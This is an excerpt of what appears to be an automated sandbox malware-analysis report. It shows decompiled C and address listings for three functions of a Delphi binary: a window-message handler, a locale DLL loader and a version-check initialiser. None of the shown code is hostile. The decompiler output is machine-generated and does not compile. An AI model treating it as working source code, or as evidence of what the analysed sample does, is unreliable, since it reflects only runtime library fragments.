45b4f4 121->142 143 463945 122->143 144 463ac3-463ae4 call 4637a8 122->144 123->86 125->100 126->86 138 463bed-463bf7 126->138 149 46398e-463993 129->149 150 463b98-463bbf SendMessageA 129->150 139 463a14-463a1c call 463f4c 130->139 140 463a0b-463a10 130->140 134->86 177 463cc5-463ccf 134->177 135->100 138->86 155 463bfd-463c07 138->155 139->86 157 463a12-463a35 call 4637a8 140->157 158 463a21-463a29 call 463ffc 140->158 142->86 185 463df1-463df7 SetFocus 142->185 143->100 186 463ae6-463b03 call 463648 PostMessageA 144->186 187 463b08-463b25 call 463638 PostMessageA 144->187 148->86 165 463eb3-463ebf call 430da8 call 430eb0 149->165 166 463999 149->166 150->86 152->86 188 463d08-463d17 call 44b158 IsWindowVisible 152->188 169 463c84-463c8c 155->169 170 463c09-463c25 call 40e8bc 155->170 157->86 158->86 165->86 204 463ec1-463ecb call 430da8 call 430f0c 165->204 166->100 169->86 197 463c27-463c4a GetProcAddress 170->197 198 463c69-463c7f GetLastError 170->198 177->86 185->86 186->86 187->86 188->86 205 463d1d-463d68 GetFocus call 44b158 SetFocus call 445ae8 SetFocus 188->205 197->86 203 463c50-463c64 197->203 198->86 203->86 204->86 205->86
      C-Code - Quality: 93%
      			E00463830(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t305;
				signed int _t307;
				struct HWND__* _t312;
				struct HWND__* _t313;
				struct HWND__* _t314;
				void* _t315;
				intOrPtr _t336;
				struct HWND__* _t340;
				intOrPtr _t362;
				void* _t364;
				void* _t368;
				void* _t369;
				intOrPtr _t370;

				_t315 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t369);
				_push(0x463ee7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t370;
				 *(_v12 + 0xc) = 0;
				_t305 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t305 < 0) {
					L5:
					E004636E4(_v8, _t315, _v12);
					_t307 =  *_v12;
					_t161 = _t307;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_pop(_t336);
									 *[fs:eax] = _t336;
									return 0;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E00465A14(_v8,  *(_v12 + 8), _t307) & 0x0000007f;
								} else {
									L101:
									E004637A8(_t369); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E00464510(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E004644B4(_v8, _t315,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t340 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t340 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t340 + 0x30))) {
										_t191 = E0045B4F4(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E00464A04(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t365 = _t197;
								_t199 = E0044B158(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0044B158(_t365));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0044B158(_t365));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x48ee24 = 0;
											_t206 = GetFocus();
											SetFocus(E0044B158(_t365));
											E00445AE8(_t365,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x48ee24 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E00464374(_v8, _t315, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00463F4C(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00463FFC(_v8);
								} else {
									E004637A8(_t369);
								}
							}
							goto L102;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t307 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E00430EB0(E00430DA8());
							__eflags = _t247;
							if(_t247 != 0) {
								E00430F0C(E00430DA8());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E00463F30(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t312 = E0040E8BC("vcltest3.dll", _t307, 0x8000);
											 *(_v8 + 0xa0) = _t312;
											__eflags = _t312;
											if(_t312 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t313 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_v16 = _t313;
												__eflags = _t313;
												if(_t313 != 0) {
													_t269 =  *(_v12 + 8);
													_v16( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x490b80; // 0x2480e74
							E00462CD4(_t272);
							E004637A8(_t369);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x48f984; // 0x490adc
							E0044FB64( *_t276, _t315,  *(_v12 + 4));
							E0046373C(_v8, _t307, _t315, _v12, _t364);
							E004637A8(_t369);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E004637A8(_t369);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E00463638();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E00463648(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							E004048C4();
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004638D4))) {
						case 0:
							0 = E0042202C(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407880();
							__eax = E004637A8(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004637A8(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0045B38C( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00463640();
							} else {
								_v8 = E00463648(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004637A8(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004077D8();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004637A8(__ebp);
							} else {
								__eax = E004637E4(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00460DD0(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004637A8(__ebp);
							goto L102;
					}
				} else {
					_t314 = _t305 + 1;
					_t368 = 0;
					do {
						if( *((intOrPtr*)(E00419C84( *((intOrPtr*)(_v8 + 0xa8)), _t315, _t368)))() != 0) {
							_pop(_t362);
							 *[fs:eax] = _t362;
							return 0;
						}
						_t368 = _t368 + 1;
						_t314 = _t314 - 1;
						__eflags = _t314;
					} while (_t314 != 0);
					goto L5;
				}
			}






















































      0x00463830
      0x00463839
      0x0046383c
      0x00463841
      0x00463842
      0x00463847
      0x0046384a
      0x00463852
      0x00463861
      0x00463864
      0x00463898
      0x0046389e
      0x004638a6
      0x004638a8
      0x004638aa
      0x004638ad
      0x00463961
      0x00463966
      0x004639b7
      0x004639bc
      0x004639dd
      0x004639dd
      0x004639e2
      0x00463e4f
      0x00463e52
      0x00463e56
      0x00463e72
      0x00463e58
      0x00463e64
      0x00463e64
      0x00463edd
      0x00463edf
      0x00463ee2
      0x00000000
      0x00463ee2
      0x004639eb
      0x004639ee
      0x00463caa
      0x004639f4
      0x00463ed6
      0x00463ed7
      0x00463edc
      0x00000000
      0x004639ee
      0x004639be
      0x00463e16
      0x00463e19
      0x00463e1d
      0x00463e45
      0x00463e1f
      0x00463e2d
      0x00463e2d
      0x00000000
      0x00463e1d
      0x004639c4
      0x004639c4
      0x004639c9
      0x00463dc4
      0x00463dc9
      0x00463dcb
      0x00463dd1
      0x00463dd6
      0x00463dd9
      0x00463ddc
      0x00463de4
      0x00463de9
      0x00463deb
      0x00463df2
      0x00463df2
      0x00463deb
      0x00463ddc
      0x00000000
      0x00463dcb
      0x004639cf
      0x004639d2
      0x00463dfc
      0x00463e0c
      0x00000000
      0x004639d8
      0x00000000
      0x004639d8
      0x004639d2
      0x00463968
      0x00463cd7
      0x00463cda
      0x00463cdc
      0x00463ce2
      0x00463ce6
      0x00463ceb
      0x00463ced
      0x00463cfb
      0x00463d00
      0x00463d02
      0x00463d10
      0x00463d15
      0x00463d17
      0x00463d1d
      0x00463d24
      0x00463d33
      0x00463d4c
      0x00463d52
      0x00463d57
      0x00463d61
      0x00463d61
      0x00463d17
      0x00463d02
      0x00463ced
      0x00000000
      0x00463cdc
      0x0046396e
      0x00463973
      0x0046399e
      0x0046399e
      0x004639a3
      0x00463d95
      0x00463d98
      0x00463da0
      0x00463db2
      0x00463db2
      0x00000000
      0x00463da0
      0x004639a9
      0x004639ac
      0x00463cb8
      0x00463cbd
      0x00463cbf
      0x00463cc8
      0x00463cc8
      0x00000000
      0x004639b2
      0x00000000
      0x004639b2
      0x004639ac
      0x00463975
      0x00463d6d
      0x00463d70
      0x00463d78
      0x00463d8a
      0x00463d8a
      0x00000000
      0x00463d78
      0x0046397b
      0x0046397b
      0x00463980
      0x00463a04
      0x00463a04
      0x00463a09
      0x00463a17
      0x00463a0b
      0x00463a0b
      0x00463a10
      0x00463a24
      0x00463a12
      0x00463a2f
      0x00463a34
      0x00463a10
      0x00000000
      0x00463a09
      0x00463985
      0x00463985
      0x00463988
      0x00463bbc
      0x00000000
      0x00463bbc
      0x0046398e
      0x00463993
      0x00463eb8
      0x00463ebd
      0x00463ebf
      0x00463ec6
      0x00463ec6
      0x00000000
      0x00463999
      0x00000000
      0x00463999
      0x00463993
      0x004638b3
      0x00000000
      0x00000000
      0x004638b9
      0x004638bc
      0x00463928
      0x0046392b
      0x0046394a
      0x0046394a
      0x0046394d
      0x00463a9a
      0x00000000
      0x00463a9a
      0x00463953
      0x00463956
      0x00463bdb
      0x00463be1
      0x00463be7
      0x00463bed
      0x00463bf0
      0x00463bf7
      0x00463bfd
      0x00463c00
      0x00463c07
      0x00463c89
      0x00463c09
      0x00463c18
      0x00463c1d
      0x00463c23
      0x00463c25
      0x00463c71
      0x00463c79
      0x00463c27
      0x00463c2c
      0x00463c43
      0x00463c45
      0x00463c48
      0x00463c4a
      0x00463c53
      0x00463c61
      0x00463c61
      0x00463c4a
      0x00463c25
      0x00463c07
      0x00463bf7
      0x00000000
      0x0046395c
      0x00000000
      0x0046395c
      0x00463956
      0x0046392d
      0x00463ea0
      0x00463ea5
      0x00463eab
      0x00000000
      0x00463eb0
      0x00463933
      0x00463933
      0x00463936
      0x00463e80
      0x00463e87
      0x00463e92
      0x00463e98
      0x00000000
      0x00463e9d
      0x0046393c
      0x0046393f
      0x00463ac4
      0x00463aca
      0x00463acd
      0x00463ad1
      0x00463ad7
      0x00463add
      0x00463ae0
      0x00463ae4
      0x00463b0b
      0x00463b20
      0x00463ae6
      0x00463ae9
      0x00463afe
      0x00463afe
      0x00000000
      0x00463945
      0x00000000
      0x00463945
      0x0046393f
      0x004638be
      0x00463bc4
      0x00463bc7
      0x00463bcb
      0x00463bd1
      0x00463bd1
      0x00000000
      0x00463bcb
      0x004638c4
      0x004638c7
      0x00000000
      0x00000000
      0x004638cd
      0x00000000
      0x00463ecf
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00463aa2
      0x00463aa4
      0x00463aa6
      0x00463aae
      0x00463ab1
      0x00463ab2
      0x00463ab8
      0x00000000
      0x00000000
      0x00463b2a
      0x00463b2d
      0x00463b31
      0x00463b65
      0x00463b6b
      0x00463b6e
      0x00463b75
      0x00463b77
      0x00463b7a
      0x00463b7d
      0x00463b82
      0x00463b85
      0x00463b85
      0x00463b8e
      0x00463b33
      0x00463b36
      0x00463b3b
      0x00463b3e
      0x00463b44
      0x00463b46
      0x00463b4d
      0x00463b50
      0x00463b50
      0x00463b52
      0x00463b52
      0x00463b59
      0x00463b5e
      0x00000000
      0x00000000
      0x00463a52
      0x00463a55
      0x00463a58
      0x00463a59
      0x00463a5e
      0x00463a60
      0x00463a6f
      0x00463a62
      0x00463a63
      0x00463a68
      0x00000000
      0x00000000
      0x00463a3a
      0x00463a3d
      0x00463a40
      0x00463a42
      0x00463a48
      0x00463a48
      0x00000000
      0x00000000
      0x00463a7a
      0x00463a7d
      0x00463a84
      0x00000000
      0x00000000
      0x00463866
      0x00463866
      0x00463867
      0x00463869
      0x00463885
      0x00463889
      0x0046388c
      0x00000000
      0x0046388c
      0x00463894
      0x00463895
      0x00463895
      0x00463895
      0x00000000
      0x00463869

      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID: RegisterAutomation$vcltest3.dll
      • API String ID: 0-2963190186
      • Opcode ID: 2f199dd43e27df91cfbf0b4e877f5457e9b3b45c1ca410db59234ec7ac341d97
      • Instruction ID: db0008a256d7e2fe8af3fe2d649bfad5a66d1a6996f7a6c8094a0fae431877c0
      • Opcode Fuzzy Hash: 2f199dd43e27df91cfbf0b4e877f5457e9b3b45c1ca410db59234ec7ac341d97
      • Instruction Fuzzy Hash: 79E15C35B04288EFDB10DF99C585A5EB7B0AF04316F2485A7E404AB352E739EF41DB1A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00406217 Relevance: 15.1, APIs: 10, Instructions: 101stringlibrarythreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 422 406217-406248 lstrcpyn GetThreadLocale GetLocaleInfoA 423 406347-40634d 422->423 424 40624e-406252 422->424 425 406254-406258 424->425 426 40625e-406275 lstrlen 424->426 425->423 425->426 427 40627a-406280 426->427 428 406282-40628b 427->428 429 40628d-406296 427->429 428->429 430 406277 428->430 429->423 431 40629c-4062a3 429->431 430->427 432 4062d1-4062d3 431->432 433 4062a5-4062cf lstrcpyn LoadLibraryExA 431->433 432->423 434 4062d5-4062d9 432->434 433->432 434->423 435 4062db-40630f lstrcpyn LoadLibraryExA 434->435 435->423 436 406311-406345 lstrcpyn LoadLibraryExA 435->436 436->423
      C-Code - Quality: 61%
      			E00406217() {
				void* _t42;
				void* _t45;
				struct HINSTANCE__* _t52;
				struct HINSTANCE__* _t59;
				struct HINSTANCE__* _t67;
				void* _t76;

				_push(0x105);
				_push( *((intOrPtr*)(_t76 - 4)));
				_push(_t76 - 0x121);
				L00401338();
				GetLocaleInfoA(GetThreadLocale(), 3, _t76 - 0xd, 5); // executed
				_t67 = 0;
				if( *(_t76 - 0x121) == 0 ||  *(_t76 - 0xd) == 0 &&  *((char*)(_t76 - 0x12)) == 0) {
					L14:
					return _t67;
				} else {
					_t42 = _t76 - 0x121;
					_push(_t42);
					L00401340();
					 *((intOrPtr*)(_t76 - 0x1c)) = _t42 + _t76 - 0x121;
					L5:
					if( *((char*)( *((intOrPtr*)(_t76 - 0x1c)))) != 0x2e && _t76 - 0x121 !=  *((intOrPtr*)(_t76 - 0x1c))) {
						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
						goto L5;
					}
					_t45 = _t76 - 0x121;
					if(_t45 !=  *((intOrPtr*)(_t76 - 0x1c))) {
						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
						if( *((char*)(_t76 - 0x12)) != 0) {
							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t45);
							_push(_t76 - 0x12);
							_push( *((intOrPtr*)(_t76 - 0x1c)));
							L00401338();
							_t67 = LoadLibraryExA(_t76 - 0x121, 0, 2);
						}
						if(_t67 == 0 &&  *(_t76 - 0xd) != 0) {
							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
							_push(_t76 - 0xd);
							_push( *((intOrPtr*)(_t76 - 0x1c)));
							L00401338();
							_t52 = LoadLibraryExA(_t76 - 0x121, 0, 2); // executed
							_t67 = _t52;
							if(_t67 == 0) {
								 *((char*)(_t76 - 0xb)) = 0;
								_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
								_push(_t76 - 0xd);
								_push( *((intOrPtr*)(_t76 - 0x1c)));
								L00401338();
								_t59 = LoadLibraryExA(_t76 - 0x121, 0, 2); // executed
								_t67 = _t59;
							}
						}
					}
					goto L14;
				}
			}









      0x00406217
      0x0040621f
      0x00406226
      0x00406227
      0x0040623a
      0x0040623f
      0x00406248
      0x00406347
      0x0040634d
      0x0040625e
      0x0040625e
      0x00406264
      0x00406265
      0x00406272
      0x0040627a
      0x00406280
      0x00406277
      0x00000000
      0x00406277
      0x0040628d
      0x00406296
      0x0040629c
      0x004062a3
      0x004062b1
      0x004062b5
      0x004062b9
      0x004062ba
      0x004062cf
      0x004062cf
      0x004062d3
      0x004062ed
      0x004062f1
      0x004062f5
      0x004062f6
      0x00406306
      0x0040630b
      0x0040630f
      0x00406311
      0x00406327
      0x0040632b
      0x0040632f
      0x00406330
      0x00406340
      0x00406345
      0x00406345
      0x0040630f
      0x004062d3
      0x00000000
      0x00406296

      APIs
      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00406227
      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00406234
      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040623A
      • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00406265
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004062BA
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004062CA
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004062F6
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406306
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00406330
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 00406340
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
      • API String ID: 1599918012-2375825460
      • Opcode ID: e0372c0f7ff9f7fa0e72ad92c661084590f743a0b0ec074fde03ecfba47853cc
      • Instruction ID: 9759b51b8d4752afdb32c10da32ac6c13e1e3f2cd71184b262c659eba76e4bcb
      • Opcode Fuzzy Hash: e0372c0f7ff9f7fa0e72ad92c661084590f743a0b0ec074fde03ecfba47853cc
      • Instruction Fuzzy Hash: 99315AB1E002096EEB25DAE8C885FEFB7BD9B18304F4041B6E945F21C1D7BCDA548B54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00450214 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
      Download Yara Rule
      C-Code - Quality: 77%
      			E00450214(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x45029a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x490ae4 =  *0x490ae4 - 1;
				if( *0x490ae4 < 0) {
					 *0x490ae0 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x490ae0;
					E0044FFC4(_t16, __edi,  *0x490ae0);
					_t6 =  *0x440008; // 0x440054
					E004192A4(_t6, _t16, _t17,  *0x490ae0);
					_t8 =  *0x440008; // 0x440054
					E00419344(_t8, _t16, _t17, _t31);
					_t21 =  *0x440008; // 0x440054
					_t10 =  *0x4516d0; // 0x45171c
					E004192F0(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x440008; // 0x440054
					_t12 =  *0x4502a4; // 0x4502f0
					E004192F0(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x440008; // 0x440054
					_t14 =  *0x4503c8; // 0x450414
					E004192F0(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4502a1);
				return 0;
			}















      0x00450214
      0x00450214
      0x00450219
      0x0045021a
      0x0045021f
      0x00450222
      0x00450225
      0x0045022c
      0x0045023c
      0x0045023c
      0x00450243
      0x00450248
      0x0045024d
      0x00450252
      0x00450257
      0x0045025c
      0x00450262
      0x00450267
      0x0045026c
      0x00450272
      0x00450277
      0x0045027c
      0x00450282
      0x00450287
      0x00450287
      0x0045028e
      0x00450291
      0x00450294
      0x00450299

      APIs
      • GetVersion.KERNEL32(00000000,0045029A), ref: 0045022E
        • Part of subcall function 0044FFC4: GetCurrentProcessId.KERNEL32(?,00000000,0045013C), ref: 0044FFE5
        • Part of subcall function 0044FFC4: GlobalAddAtomA.KERNEL32 ref: 00450018
        • Part of subcall function 0044FFC4: GetCurrentThreadId.KERNEL32 ref: 00450033
